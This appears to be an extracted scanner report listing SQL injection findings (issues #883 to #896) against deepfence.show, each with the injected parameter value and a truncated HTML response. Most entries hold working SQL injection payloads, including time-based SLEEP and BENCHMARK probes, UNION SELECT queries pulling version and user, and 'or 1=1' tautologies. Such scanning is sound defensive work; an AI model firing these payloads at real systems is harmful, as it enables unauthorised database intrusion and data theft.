href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #883\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ') or benchmark(10000000,MD5(1))#ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #884\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 27#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.ioCWE-ID CWE-89\nIssue Number #885\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 3--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #886\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io-2\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #887\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioadmin\" or 1=1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #888Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #889\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io'\\\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #890\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #891\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #892\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #893\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #894\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters demouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #895\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ' AND MID(VERSION(),1,1) = '5';\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #896\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 